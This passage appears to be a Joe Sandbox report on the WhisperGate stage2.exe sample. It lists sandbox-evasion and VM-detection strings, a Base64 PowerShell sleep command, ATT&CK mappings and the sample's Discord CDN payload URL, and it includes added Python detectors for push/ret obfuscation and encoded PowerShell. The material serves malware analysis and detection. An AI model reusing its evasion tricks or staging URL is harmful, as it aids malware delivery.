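        elif PUSH_REG_BASE <= op <= PUSH_REG_BASE + 7 and i + 1 < n and code[i + 1] == RET_NEAR:
            hits.append((base + i, REG_NAMES[op - PUSH_REG_BASE], None))
            i += 2
        elif op == PUSH_ES and i + 1 < n and code[i + 1] == RET_NEAR:
            hits.append((base + i, "es", None))
            i += 2
        else:
            i += 1
    return hits


def classify_target(target, image_base: int, image_size: int, user_limit: int = 0x80000000) -> str:
    """Judge whether a push imm32 / ret target is a plausible code address.
    user_limit is the top of user-mode space for a default 32-bit process
    (assumption: a large-address-aware WOW64 process can use more)."""
    if target is None:
        return "dynamic"           # register/segment operand, resolve at run time
    if image_base <= target < image_base + image_size:
        return "in-image"          # a real obfuscated jump inside the module
    if target >= user_limit:
        return "implausible"       # above user space: treat as data, not control flow
    return "outside-image"         # heap or another module; needs the memory map to judge


def report(code: bytes, base: int, image_base: int, image_size: int):
    """Render each hit in the report's own 'push X; ret' style with a verdict."""
    lines = []
    for addr, operand, target in find_push_ret(code, base):
        verdict = classify_target(target, image_base, image_size)
        lines.append(f"{addr:08X} push {operand}; ret  [{verdict}]")
    return lines


# Constructed sample bytes; not taken from stage2.exe or powershell.exe
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,                    # push ebp; mov ebp, esp   (normal prologue, not flagged)
    0x68, 0x4E, 0x08, 0x33, 0xC0, 0xC3,  # push C033084Eh; ret      (same immediate the report lists)
    0x90, 0x90,                          # nop; nop
    0x50, 0xC3,                          # push eax; ret
    0x06, 0xC3,                          # push es; ret
    0x68, 0x00, 0x10, 0x40, 0x00, 0xC3,  # push 00401000h; ret      (target inside the assumed image)
    0x5D, 0xC3,                          # pop ebp; ret             (not a push, not flagged)
])

if __name__ == "__main__":
    for line in report(SAMPLE, base=0x07E77000, image_base=0x00400000, image_size=0x10000):
        print(line)
```

For non-adjacent pairs like the ones in the report, run the same classification over each push imm32 and the nearest following ret taken from a proper disassembly rather than from raw bytes, so that a C3 inside an immediate or displacement is not mistaken for a ret.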
    Source: C:\Users\user\Desktop\stage2.exe    Process information set: NOOPENFILEERRORBOX (SetErrorMode with SEM_NOOPENFILEERRORBOX, 0x8000, which suppresses the dialog Windows would otherwise show when a file cannot be opened; the report logs this call repeatedly for this process. Both stage2.exe and powershell.exe are CLR-hosted processes, so on its own this flag is weak evidence of deliberate evasion.)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX (logged repeatedly for this process)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540; Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6456; Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684; Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (3x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3260
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1461
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4329
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3659
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (3x)
    Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmp; Binary or memory string: Hyper-V
    Source: Amcache.hve.26.dr; Binary or memory string: VMware
    Source: Amcache.hve.26.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
    Source: Amcache.hve.26.dr; Binary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.26.dr; Binary or memory string: VMware, Inc.
    Source: Amcache.hve.26.dr; Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
    Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427690622.0000000004CA2000.00000004.00000001.sdmp; Binary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475815541.0000000004BD3000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.478987968.0000000004B64000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479178780.0000000004BD3000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
    Source: Amcache.hve.26.dr; Binary or memory string: VMware, Inc.me
    Source: WerFault.exe, 0000001A.00000003.473935861.0000000004BD3000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: Amcache.hve.26.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
    Source: Amcache.hve.26.dr; Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
    Source: Amcache.hve.26.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.26.dr; Binary or memory string: VMware7,1
    Source: Amcache.hve.26.dr; Binary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.26.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.26.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.26.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.26.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.26.dr; Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
    Source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4}{
    Source: powershell.exe, 0000000D.00000002.431025294.0000000007A94000.00000004.00000001.sdmp; Binary or memory string: hell\v1.0\Modules\Hyper-V
    Source: Amcache.hve.26.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp; Binary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-VhD
    Source: C:\Users\user\Desktop\stage2.exe; Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug (2x)
    Source: C:\Users\user\Desktop\stage2.exe; Process queried: DebugPort (2x)
    Source: C:\Users\user\Desktop\stage2.exe; Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion:

    Encrypted powershell cmdline option found
    Source: C:\Users\user\Desktop\stage2.exe; Process created: Base64 decoded Start-Sleep -s 10 (2x)
    Source: C:\Users\user\Desktop\stage2.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== (2x)
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp; Binary or memory string: Program Manager
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp; Binary or memory string: Progman
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\stage2.exe; Queries volume information: C:\Users\user\Desktop\stage2.exe VolumeInformation
    Source: C:\Users\user\Desktop\stage2.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation (2x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation (2x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation (2x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation (2x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation (2x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (6x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (9x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation (2x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (6x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation (2x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation (2x)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation (2x)
    Source: C:\Users\user\Desktop\stage2.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 13_2_080D5860 CreateNamedPipeW
    Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.dr; Binary or memory string: c:\users\user\desktop\procexp.exe
    Source: Amcache.hve.26.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.dr; Binary or memory string: procexp.exe
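    The "Encrypted powershell cmdline option found" signature above refers to the -enc argument stage2.exe passed to powershell.exe, which the sandbox decoded to Start-Sleep -s 10. Despite the signature's name, nothing here is encrypted: -EncodedCommand takes the script as UTF-16LE text, Base64-encoded, so anyone holding the process-creation event can recover it. The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code. It shows how the argument is built and how to pull it back out of command lines in process-creation logs. The event records are constructed to resemble Sysmon Event ID 1 fields (the first CommandLine is the one recorded in this report, the PIDs and the other two events are made up), and the handling of the short switch forms reflects powershell.exe's parameter parser, which accepts any prefix of -EncodedCommand down to -e as well as the -ec alias; a detector that only looks for the literal string "-enc" misses those.

```python
import base64
import re
from typing import Dict, List, Optional

# powershell.exe accepts any prefix of -EncodedCommand down to -e, plus the
# -ec alias, and "/" as a switch character, so the switch name is matched
# loosely here and checked against that rule below. The Base64 value may be
# quoted and may carry up to two "=" padding characters.
_SWITCH_RE = re.compile(
    r"""(?:^|\s)[-/](?P<flag>[A-Za-z]+)\s+["']?(?P<b64>[A-Za-z0-9+/]+={0,2})["']?"""
)


def is_encoded_command_flag(flag: str) -> bool:
    """True for -e, -en, -enc, ... -EncodedCommand (any prefix) and the -ec alias."""
    f = flag.lower()
    return f == "ec" or "encodedcommand".startswith(f)


def encode_command(script: str) -> str:
    """Build the argument the way a launcher does: UTF-16LE text, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind an -EncodedCommand switch, or None."""
    for m in _SWITCH_RE.finditer(cmdline):
        if not is_encoded_command_flag(m.group("flag")):
            continue
        try:
            raw = base64.b64decode(m.group("b64"), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        # A real payload is UTF-16LE: even byte count and cleanly decodable.
        if len(raw) % 2:
            continue
        try:
            return raw.decode("utf-16-le")
        except UnicodeDecodeError:
            continue
    return None


# Constructed process-creation events modelled on Sysmon Event ID 1 fields.
# The first CommandLine is the one recorded in the report; PIDs are
# illustrative and the other two events are invented for the example.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"ProcessId": 7160, "ParentImage": r"C:\Users\user\Desktop\stage2.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    "-enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA=="},
    {"ProcessId": 4242, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"ProcessId": 4243, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -w hidden -ec "
                    + encode_command(r"Get-Process | Out-File C:\Temp\p.txt")},
]


def find_encoded_powershell(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Scan process-creation events and report every decodable -EncodedCommand payload."""
    hits: List[Dict[str, object]] = []
    for ev in events:
        decoded = decode_encoded_command(str(ev["CommandLine"]))
        if decoded is not None:
            hits.append({"ProcessId": ev["ProcessId"],
                         "ParentImage": ev["ParentImage"],
                         "Decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in find_encoded_powershell(SAMPLE_EVENTS):
        print(f"PID {hit['ProcessId']} (parent {hit['ParentImage']}): {hit['Decoded']}")
```

    Run on the constructed events, the scan reports the report's own command line as Start-Sleep -s 10 and the -ec variant as the Get-Process pipeline, and ignores the benign -ExecutionPolicy invocation. The decoded text is what a triage rule should act on: a ten-second sleep launched by an unknown parent is a sandbox-delay pattern, and it is invisible to any rule that inspects only the raw Base64.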

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | PowerShell1 | Path Interception | Process Injection13 | Masquerading1 | OS Credential Dumping | Security Software Discovery21 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel21 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection13 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol4 | SIM Card Swap | Carrier Billing Fraud |
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information1 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing1 | DCSync | System Information Discovery12 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

    Behavior Graph

    Behavior Graph ID: 553986; Sample: stage2.exe; Start date: 17/01/2022; Architecture: WINDOWS; Score: 72. Root-level signatures: Multi AV Scanner detection for submitted file; Yara detected MSILDownloaderGeneric; .NET source code contains potential unpacker; 2 other signatures. stage2.exe is started and contacts cdn.discordapp.com (162.159.130.233, port 443, local port 49752, CLOUDFLARENETUS, United States); signature on this node: Encrypted powershell cmdline option found. stage2.exe starts WerFault.exe and two powershell.exe instances. WerFault.exe contacts 192.168.2.1 (unknown) and drops C:\ProgramData\Microsoft\...\Report.wer (Little-endian). Each powershell.exe starts conhost.exe.

    Screenshots


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    stage2.exe | 45% | Virustotal |
    stage2.exe | 49% | ReversingLabs | ByteCode-MSIL.Network.WhisperGate
    stage2.exe | 100% | Joe Sandbox ML |

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    https://watson.telemetry) | 0% | Avira URL Cloud | safe
    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
    http://crl.microsoft | 0% | URL Reputation | safe
    https://go.micro | 0% | URL Reputation | safe
    https://contoso.com/License | 0% | URL Reputation | safe
    https://contoso.com/Icon | 0% | URL Reputation | safe
    https://cdn.discordapp.com4 | 0% | URL Reputation | safe
    https://contoso.com/ | 0% | URL Reputation | safe
    http://pesterbdd.com/images/Pester.png$ | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    cdn.discordapp.com | 162.159.130.233 | true | false | | high

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    https://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg | false | | high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://watson.telemetry)WerFault.exe, 0000001A.00000002.478119853.0000000000DAA000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        low
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
          high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
            high
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                high
                http://crl.microsoftpowershell.exe, 0000000D.00000002.432860821.0000000009220000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
                  high
                  https://go.micropowershell.exe, 00000002.00000002.341684839.0000000005150000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.429277847.0000000004FA7000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | - | high
https://github.com/Pester/Pester$ | powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | false | - | high
http://upx.sf.net | Amcache.hve.26.dr | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | - | high
https://cdn.discordapp.com | stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | - | high
https://cdn.discordapp.com4 | stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html$ | powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | false | - | high
http://cdn.discordapp.com | stage2.exe, 00000001.00000000.438989759.000000000337A000.00000004.00000001.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png$ | powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.340839036.0000000004DC1000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427485435.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | - | high

                                                      Contacted IPs


                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
162.159.130.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false

                                                      Private

                                                      IP
                                                      192.168.2.1

                                                      General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553986
Start date: 17.01.2022
Start time: 02:23:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 44s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: stage2.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
